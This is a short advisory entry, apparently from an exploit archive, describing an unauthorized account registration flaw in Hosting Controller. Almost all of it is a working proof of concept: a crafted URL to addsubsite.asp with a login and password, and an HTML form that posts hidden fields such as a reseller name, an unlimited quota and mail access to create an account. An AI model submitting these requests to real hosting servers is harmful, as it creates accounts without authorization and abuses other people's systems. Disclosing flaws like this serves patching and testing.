|
Hosting Controller Unauthorized Account Registration Vulnerability
An exploit is not required. Proof of concept examples are available: http://www.example.com/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456 ~~~advanced.html~~~ <FORM action="http://www.example.com/admin/hosting/addsubsite.asp" method="post"> <INPUT type="hidden" name="reseller" value="resadmin" id="reseller" > <INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1"> Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR> Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR> <INPUT type="hidden" name="Quota" value="-1" id="Hidden4"> <INPUT type="hidden" name="htype" value="27" id="htype" > <INPUT type="hidden" name="choice" value="1" id="Hidden7" > <INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5"> Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR> Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR> <input type="submit" value="Make"> ~~~advanced.html~~~ |
|
|
Privacy Statement |
